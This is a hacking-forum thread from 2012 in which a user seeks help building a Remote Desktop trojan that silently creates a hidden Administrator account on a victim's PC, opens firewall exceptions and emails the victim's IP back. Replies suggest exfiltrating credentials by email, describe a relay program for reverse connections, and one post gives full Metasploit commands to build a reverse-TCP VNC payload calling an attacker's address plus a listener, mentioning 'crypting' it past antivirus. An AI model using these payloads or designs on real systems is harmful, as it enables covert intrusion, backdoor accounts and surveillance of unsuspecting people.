Author Topic: Remote Desktop Trojan  (Read 7422 times)

Offline Kulverstukas

  • Administrator
  • Zeus
  • *
  • Posts: 6627
  • Cookies: 542
  • Fascist dictator
Re: Remote Desktop Trojan
« Reply #15 on: March 16, 2012, 08:36:06 PM »
I don't know much about RDP. But keep in mind that a virus should have everything in itself. Additional batch or VBScript files are not how viruses roll.

Offline Infinityexists

  • Peasant
  • *
  • Posts: 74
  • Cookies: 1
Re: Remote Desktop Trojan
« Reply #16 on: March 16, 2012, 11:15:51 PM »
Quote
I don't know much about RDP. But keep in mind that a virus should have everything in itself. Additional batch or VBScript files are not how viruses roll.


Don't worry about that bro, it's not gonna have any additional file, it will be fully compiled/encrypted into a single executable file.
The only problem I want to resolve right now: if the connection is reverse, how I'd be able to look into the victim's PC.
If it is possible I'll find out :)

I've already generated a simple VBScript code to add an exception into Windows Firewall to allow RDP connection / FTP request, and if the exception is already blocked by the victim then instead of adding a new exception it will override the already defined exception and set its status to 'Allow' :)

Offline Kulverstukas

  • Administrator
  • Zeus
  • *
  • Posts: 6627
  • Cookies: 542
  • Fascist dictator
Re: Remote Desktop Trojan
« Reply #17 on: March 17, 2012, 05:05:16 PM »
If you are enabling the Windows default RDP then I guess you don't need to put exceptions in the Firewall. You don't even need to do anything else, I think. Just enable the RDP with the settings you want, then let the virus send the info back to you, like the IP, port, user and password - this might be tricky, maybe email?

Offline Infinityexists

  • Peasant
  • *
  • Posts: 74
  • Cookies: 1
Re: Remote Desktop Trojan
« Reply #18 on: March 17, 2012, 05:46:02 PM »
Quote
If you are enabling the Windows default RDP then I guess you don't need to put exceptions in the Firewall. You don't even need to do anything else, I think. Just enable the RDP with the settings you want, then let the virus send the info back to you, like the IP, port, user and password - this might be tricky, maybe email?


Easy as pie ;) it will be done

Offline ande

  • Owner
  • Titan
  • *
  • Posts: 2664
  • Cookies: 256
Re: Remote Desktop Trojan
« Reply #19 on: March 18, 2012, 06:05:27 AM »
Let me just start off by saying that I really do not know how to start this reply. This topic contains so much retarded text and information written in a manner that should never see the light of day.

The things discussed in this topic are basic networking knowledge. Not the RDC part, but the WAN/LAN/routing part.

To start off, I will answer the original topic question:
Quote
How does a Remote Desktop trojan work? Does it enable port 3389 (default) itself at the victim's router configuration? If not, how does it work? Since if I want to code my own, it is only possible if the victim has enabled router port 3389?
(quote above is not original, corrected quite a lot.)
<rant>
When you use commas, use them correctly. It is not "word , word" or "word,word" or "word ,word". It is "word, word".
One does not use capital letters in words that are not names, locations, abbreviations and a few other exceptions.
Use punctuation.
Use question marks.
Use line breaks.
DO NOT USE THE WORD "BRO" OR ALIKE.

This may not be as annoying to you and people writing like yourself right now. But once you stop writing like a fool and start writing understandably, it is a real mother-fucking-pain in the ass.
</rant>

Now on to your question:
Very, very few applications/services auto-forward their ports in routers, and Microsoft's remote desktop control service is not one of them. This is simply because there are no standards for this (I am sure there are more reasons for it as well). All routers (most) are different from one another and so forth.
However, there is something called UPnP which allows for temporary port forwarding. Various torrent clients and so forth use UPnP to allow file exchange. I suggest you look into that, or use reverse connection technology.

In reply to this part of your question (", if no then how it works :S"): If you are in a LAN and separated from the Internet by a router or other means of network separation, you have to configure your separation device(s) to forward specific ports and/or addresses to the correct machine inside the LAN and then connect to the router's public IP (often referred to as port forwarding).

I would suggest you look away from most other replies than mine in this topic as they are just confusing and/or wrong. I would also suggest you do the first part of a CCNA Cisco certification or something along those lines. Not saying that you need to have a deep understanding of everything before moving on, but it's a smart choice if you do.

I would also like to apologize for any offense people will take from this as I know people will. The 'rant' section of this reply is a general reply to all rubbish-writers. I do not mean to offend anyone, but I just can't stand people who can't write properly. Even though I have been there and done that.
« Last Edit: March 18, 2012, 06:08:34 AM by ande »
if($statement) { unless(!$statement) { // Very sure } }
https://evilzone.org/?hack=true

Offline Infinityexists

  • Peasant
  • *
  • Posts: 74
  • Cookies: 1
Re: Remote Desktop Trojan
« Reply #20 on: March 19, 2012, 10:55:56 PM »
Quote (Reply #19 above)

I want to use a Reverse Connection Technique to connect to the PC.
I've coded the complete program that, when run, creates a new hidden Administrator account with the password of my choice inside the victim's computer and then emails me the victim's IP address and computer name. But what to do after that? I need any ideas of reverse connecting through Remote Desktop, so even if I receive an RD request from the victim he wouldn't even know what has happened, and he won't be able to see my desktop; rather I would be able to see his desktop, or even if I can browse the victim's PC.

The Remote Desktop connection could easily be executed in the background using the mstsc command with blah blah parameter.

Offline ande

  • Owner
  • Titan
  • *
  • Posts: 2664
  • Cookies: 256
Re: Remote Desktop Trojan
« Reply #21 on: March 20, 2012, 01:09:02 AM »
The concept of reverse connection does not mean that you reverse the action being performed. Only the connectivity establishment. I assume you are using the Windows remote desktop control crap, which means there is no inbuilt reverse connection and you are pretty much screwed.

You could, however, though I think it's a little bit out of your skill capacity still, create a software solution to overcome this:
Instead of connecting to your victim's IP, you connect to your localhost where there will be a program listening. This program at the same time listens on a remote port which a second program running on your victim's computer is constantly trying to connect to. And once you connect to the local program on your machine, and there is a connection from your machine's program to the victim's program, a message will be sent by your program to the other program making the other program connect to localhost on your victim's computer. Once all the above has been done, the programs will not do anything other than passing traffic along. Piping your remote desktop control client to your victim's remote desktop control server.

Client <-> Local program <- INTERNET -> Victim program <-> Server

Offline noob

  • Knight
  • **
  • Posts: 202
  • Cookies: 29
Re: Remote Desktop Trojan
« Reply #22 on: March 20, 2012, 02:57:12 AM »
Why don't you try a reverse VNC session with Metasploit:

Create payload:
./msfpayload windows/vncinject/reverse_tcp LHOST=192.168.1.12 LPORT=2482 X > /tmp/reverse-vnc.exe

Listener:
./msfcli exploit/multi/handler PAYLOAD=windows/vncinject/reverse_tcp LHOST=192.168.1.12 LPORT=2482 DisableCourtesyShell=TRUE E

Of course this will be detected by AV if you don't know how to crypt it.

Offline Infinityexists

  • Peasant
  • *
  • Posts: 74
  • Cookies: 1
Re: Remote Desktop Trojan
« Reply #23 on: March 21, 2012, 05:14:25 PM »
Quote
you connect to your localhost where there will be a program listening. This program at the same time listens on a remote port which a second program running on your victim's computer is constantly trying to connect to. And once you connect to the local program on your machine, and there is a connection from your machine's program to the victim's program, a message will be sent by your program to the other program making the other program connect to localhost on your victim's computer. Once all the above has been done, the programs will not do anything other than passing traffic along. Piping your remote desktop control client to your victim's remote desktop control server.

Client <-> Local program <- INTERNET -> Victim program <-> Server

The quoted part sounds really interesting, I understand a bit of it.

OK first, I connect to my localhost using XAMPP, but what exactly does that mean: 'there will be a program listening This program at the same time listens to a remote port which a second program running on your victims computer'?

Could you elaborate or give me any clue where I can read more about it?
I actually need a proper example about this.

Quote (Reply #22 above)

Payload, listener thing are way out of my knowledge :D
but I'd love to look into it if you can tell me more or link me to the basics :)